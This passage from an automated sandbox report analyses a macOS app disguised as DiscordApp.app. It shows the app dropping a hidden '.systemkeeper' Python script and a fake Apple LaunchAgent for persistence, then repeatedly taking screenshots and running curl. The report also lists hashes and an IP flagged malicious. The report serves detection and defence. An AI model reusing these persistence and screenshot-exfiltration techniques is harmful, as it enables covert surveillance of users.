      • grep (PID: 593 PPID: 590 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 598 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 598 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 598 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 600 PPID: 598 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 600 PPID: 598 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 601 PPID: 600 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 601 PPID: 600 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 602 PPID: 600 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 602 PPID: 600 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 603 PPID: 600 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 603 PPID: 600 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 607 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 607 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 607 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 608 PPID: 607 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 608 PPID: 607 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 609 PPID: 608 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 609 PPID: 608 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 610 PPID: 608 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 610 PPID: 608 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 611 PPID: 608 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 611 PPID: 608 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 616 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 616 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 616 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 617 PPID: 616 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 617 PPID: 616 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 618 PPID: 617 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 618 PPID: 617 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 619 PPID: 617 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 619 PPID: 617 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 620 PPID: 617 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 620 PPID: 617 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 623 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 623 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 623 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 624 PPID: 623 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 624 PPID: 623 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 625 PPID: 624 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 625 PPID: 624 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 626 PPID: 624 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 626 PPID: 624 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 627 PPID: 624 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 627 PPID: 624 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 632 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 632 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 632 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 633 PPID: 632 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 633 PPID: 632 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 634 PPID: 633 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 634 PPID: 633 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 635 PPID: 633 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 635 PPID: 633 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 636 PPID: 633 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 636 PPID: 633 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 641 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 641 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 641 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 642 PPID: 641 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 642 PPID: 641 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 643 PPID: 642 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 643 PPID: 642 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 644 PPID: 642 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 644 PPID: 642 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 645 PPID: 642 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 645 PPID: 642 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 648 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 648 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 648 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 650 PPID: 648 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 650 PPID: 648 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 651 PPID: 650 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 651 PPID: 650 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 652 PPID: 650 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 652 PPID: 650 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 653 PPID: 650 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 653 PPID: 650 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 657 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 657 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 657 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 658 PPID: 657 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 658 PPID: 657 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 659 PPID: 658 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 659 PPID: 658 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 660 PPID: 658 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 660 PPID: 658 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 661 PPID: 658 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 661 PPID: 658 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 666 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 666 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 666 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 667 PPID: 666 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 667 PPID: 666 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 668 PPID: 667 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 668 PPID: 667 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 669 PPID: 667 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 669 PPID: 667 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 670 PPID: 667 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 670 PPID: 667 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 673 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 673 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 673 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 674 PPID: 673 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 674 PPID: 673 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 675 PPID: 674 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 675 PPID: 674 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 676 PPID: 674 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 676 PPID: 674 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 677 PPID: 674 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 677 PPID: 674 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • cleanup

Created / dropped Files

/Users/henry/.system/.helper
Process:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File Type:ASCII text
Size (bytes):200
Entropy (8bit):5.310703647960047
Encrypted:false
MD5:09DF808B29CFFA8DDF5200ADF05A2059
SHA1:05964912FA44696301348F7768D9BF76AF65FD5E
SHA-256:88D5E1CFDC6BF3824CB5227827BA2F790EAAAD512693DE6B72D29FDB1DB46081
SHA-512:C606F038D17115953F22AF86B9C965BD52F03BBD2560479F40DF3ADE0B3E72CF95AAC0C6D7076B1A6D76F2DC19566EC0798FF5C81609EB91D8166B1A28659ECC
Malicious:false
Reputation:low
/Users/henry/.system/.systemkeeper
Process:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File Type:python script text executable
Size (bytes):1195
Entropy (8bit):5.853894166617507
Encrypted:false
MD5:4D733D44288F4357C292938F0A18A7E9
SHA1:7BC283212EE6BD822F54EA52E0B02525A904FF4D
SHA-256:31935F731329487C87B96653F6C3936CCA6CBED64F800AD24047E3BFA1434969
SHA-512:4086425D1FFD3BCBCD2C4A4A3E916F3E2EFE0BC5B5BA9B3AFF24536B0B1A1894E2118FC6406B736E7842112CB9F317FCAFBE5B581C3BE5F420C45DE03C36A27E
Malicious:false
Reputation:low
/Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plist
Process:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File Type:XML document text
Size (bytes):498
Entropy (8bit):4.936403071791542
Encrypted:false
MD5:82661875BA5F04E3032CECAB4FCFE450
SHA1:D9631495F1E65D9CD2A16600EAF5DBED40648FD3
SHA-256:8E29003A9C9FA5D67836D7D5F13B77ECEBB006D4498F677759C24A8076103585
SHA-512:C85B72E464D700A15F5742BC433620F6CC204B3A9EDE936CCBD690C79F6F4FB1911D44184CEFA31132F57CC1180FFB946F4A9517E64D46A1E4070ABB6E86D27F
Malicious:true
Reputation:low
/dev/null
Process:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File Type:ASCII Java program text, with very long lines
Size (bytes):2113
Entropy (8bit):5.895530958706696
Encrypted:false
MD5:FA868298B4E3744A992D808BB45CC48D
SHA1:5FA8AA1A46D1CE4BCBD923E11B522BA047B95457
SHA-256:1CE247126AEBAE0B9497682C81D29B4DD5D27C710461BD6F0BDEBA97A45181EF
SHA-512:B90C63CAD3602B938EF8C59533E70D2BFA26FD6DED0BF458CF9997470651F06BA757A144092216DC5C52E22872B304BA68F80ECF85AC249635047C2C20457FB0
Malicious:false
Reputation:low
/private/tmp/.alloy.png-0JUk
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401838
Entropy (8bit):7.990957319860019
Encrypted:true
MD5:0D63766437ADA009F9AEECD38F7324E5
SHA1:894989E55C38807A19E4A019C67172513C259800
SHA-256:0F58E851DCD840AA2E4C0ED8DEE78F37D854DE2A34D4F401A0373455CECBD46C
SHA-512:AB02D6D3A22CD49ACC1CDBD4FFA31FAC21F749BB9955EA44BC65A44D0523A84ABD8A50128FA9692826C13D57E8056205930D18328D57415400EA430D128932FC
Malicious:false
Reputation:low
/private/tmp/.alloy.png-17cr
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401892
Entropy (8bit):7.9906035023153965
Encrypted:true
MD5:513F8FFEC7D1274A058D5B96D452F192
SHA1:FDC27C782EE215EB3C3781F8C49C4171FD7404EB
SHA-256:51F79BE2DF1EBE3EE7BC3BD441BCADCFC82F72DF426C2D5442DA6B3F54ED5930
SHA-512:36D79867FB6359B7BF5A87F6E02F63F80128236B0EBE1BF96C778DACAB187D7C9E63D873D8C61D4DF1E8DD130C24F6E276DABC3B9B46495818B3D86903E2B30E
Malicious:false
Reputation:low
/private/tmp/.alloy.png-3tBv
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401871
Entropy (8bit):7.9908226984392385
Encrypted:true
MD5:C2FC061E5DA54F8EAC3C513E01922EDA
SHA1:694FBB39BE3A964F54E1AFBA161D320C4657C6D8
SHA-256:3E7B36FED677D2BF505A3C8E980383EFAD8E8DD8AD76274143F98A77291E304D
SHA-512:1E694BF66703824983936DBC44E9757ACF2BD3A62E42FB52B76538D2E3C231E78C1F8517D37A7DE1F9F36167A54E39FEA506746A7C97BF95C85BC8E78B9C7176
Malicious:false
Reputation:low
/private/tmp/.alloy.png-8UHL
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401890
Entropy (8bit):7.99100176462052
Encrypted:true
MD5:0D87DC7C562AD58147D9E5A4FDD8332A
SHA1:DC166990CD0E0E7A2E1B07056D5378D6A16AC969
SHA-256:962E7ABE17B452BE779303EA79B2699E4F24D5277E6BE7190C4875F13E1E2EE0
SHA-512:4176A0DBF36C4651EE8E24E3C92E46D1BB6B5197E6F8EAF878D31932161389CC3B66AF6086CE94FEF9BA977DD490E61E49082F89B552DA2640E89DFD28130A24
Malicious:false
Reputation:low
/private/tmp/.alloy.png-9exN
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401859
Entropy (8bit):7.991134807097194
Encrypted:true
MD5:200E6CCD86DA528335807CF736864FAB
SHA1:5FCC718268A937357A48919D12833E932E714737
SHA-256:3B48CAD3BC5C58EF3E4E3363F171AE6DB544D1B2BFCBD85E57414458A97DA42E
SHA-512:98E082E134BE1BADF4378DCE57051ACBA46FB4F916690B9B80789F06AAEC7D61E489A5889E7667C507250A7586A2C21219BAE95DF6CE3C4DC5F3F2CF8F4E1331
Malicious:false
Reputation:low
/private/tmp/.alloy.png-Ciot
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401874
Entropy (8bit):7.990837966703897
Encrypted:true
MD5:6618E1D49323722714C366E1B3A2581F
SHA1:D11C4A43A36196EAFE65D26EF5DF217DEB2B8547
SHA-256:F73D4A0CFC890E97118B56A64948C85DD028D92EF349E7CE5AE144A3B6182189
SHA-512:B9E07BD325AE366D4E3D440359FF27FD599E7E2BA6236A728866C718E89C63CB352272244A8D72DA31140F69116345C305688CD7172094FCAB5E926803CC52B0
Malicious:false
Reputation:low
/private/tmp/.alloy.png-Idi5
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401841
Entropy (8bit):7.9907897253396545
Encrypted:true
Malicious:false
Reputation:low
/private/tmp/.alloy.png-Jwlg
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401838
Entropy (8bit):7.990957319860019
Encrypted:true
Malicious:false
Reputation:low
/private/tmp/.alloy.png-MR2Y
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401845
Entropy (8bit):7.991098486293245
Encrypted:true
Malicious:false
Reputation:low
/private/tmp/.alloy.png-NqNk
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401868
Entropy (8bit):7.991117559100855
Encrypted:true
Malicious:false
Reputation:low
/private/tmp/.alloy.png-OKVg
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401852
Entropy (8bit):7.991076518992314
Encrypted:true
Malicious:false
Reputation:low
/private/tmp/.alloy.png-Scvr
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401845
Entropy (8bit):7.990731404741683
Encrypted:true
Malicious:false
Reputation:low
/private/tmp/.alloy.png-WEFK
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401857
Entropy (8bit):7.990591595082753
Encrypted:true
Malicious:false
Reputation:low
/private/tmp/.alloy.png-bSGC
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401580
Entropy (8bit):7.991248997254125
Encrypted:true
Malicious:false
Reputation:low
/private/tmp/.alloy.png-fVAs
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401799
Entropy (8bit):7.991157615425265
Encrypted:true
Malicious:false
Reputation:low
/private/tmp/.alloy.png-lIjK
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401851
Entropy (8bit):7.990560637454618
Encrypted:true
Malicious:false
Reputation:low
/private/tmp/.alloy.png-trDy
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401802
Entropy (8bit):7.9912148250586625
Encrypted:true
Malicious:false
Reputation:low
/private/tmp/.alloy.png-whQ4
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401851
Entropy (8bit):7.990560637454618
Encrypted:true
Malicious:false
Reputation:low
/private/tmp/.alloy.png-ykTw
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401922
Entropy (8bit):7.990748472957597
Encrypted:true
Malicious:false
Reputation:low

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs


Public

IP | Country | ASN | ASN Name | Malicious
37.1.221.204 | Ukraine | 28753 | LEASEWEB-DE | true
17.253.57.212 | United States | 6185 | APPLE-AUSTIN-AppleIncUS | false

Static File Info

General

File type:Zip archive data, at least v2.0 to extract
Entropy (8bit):7.992531528655837
TrID:
  • Mac OS X Application Bundle (12004/1) 74.99%
  • ZIP compressed archive (4004/1) 25.01%
File name:Pe7niErK6B.app
File size:1285818
MD5:1dc949fbb35b816b3046731d8db98a3d
SHA1:ffc4872e8fffd81eed1b94a6d68f1442e61c380b
SHA256:a899a7d33d9ba80b6f9500585fa108178753894dfd249c2ba64c9d6a601c516b
SHA512:05218229cd1bdf9f01794a4f2d9f17aa3b3d9ff9bc738f796edc95924ecb616580dc8e74d3dff60803cd7a52fd5cbd685ceac2ad55058397a7b22094f20e101b
SSDEEP:24576:0RgQEIOJPjMLMEi1mEM+2FJK98jurUAsl8WXlYgv5SM9+AfMbYfmQOxNlxAWNWCa:03AAMd56GEsUAL0rvJnf0Yf6hAU0V
File Content Preview:PK..........WM................DiscordApp.app/..PK........Ju.M................DiscordApp.app/Contents/..PK........Ju.M................DiscordApp.app/Icon...PK........Ju.MG1.......(..&...DiscordApp.app/Contents/document.wflow.ZY..Xv~...rF...#S.DVj...B...(u.

Network Behavior

TCP Packets


ICMP Packets

Dez 12, 2018 11:26:41.527484894 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable

System Behavior

General

Start time:11:24:38
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:11:24:38
Start date:12/12/2018
Path:/Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub
File size:69308 bytes
MD5 hash:9c5867b717c3b80c525f4038ff075186

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:24:40
Start date:12/12/2018
Path:/usr/bin/base64
File size:23248 bytes
MD5 hash:718fe34e4012999c180f807fe323e7f1

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:24:40
Start date:12/12/2018
Path:/usr/bin/python
File size:66880 bytes
MD5 hash:2464fd41f7cf319d0e5c61a7643af77e

General

Start time:11:24:40
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:24:42
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:24:42
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:42
Start date:12/12/2018
Path:/bin/mkdir
File size:18592 bytes
MD5 hash:135a3b94b3d9efccb4c8cd23ac404571

General

Start time:11:24:42
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:24:42
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:42
Start date:12/12/2018
Path:/bin/mkdir
File size:18592 bytes
MD5 hash:135a3b94b3d9efccb4c8cd23ac404571

General

Start time:11:24:42
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:24:42
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:42
Start date:12/12/2018
Path:/bin/launchctl
File size:124656 bytes
MD5 hash:17fad4b994d600d0a5b6bc02b55c2c80

General

Start time:11:24:44
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:44
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:44
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:24:44
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:24:45
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:24:45
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:24:50
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:24:50
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:24:50
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:24:50
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:24:57
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:24:57
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:24:57
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:24:57
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:03
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:03
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:25:09
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

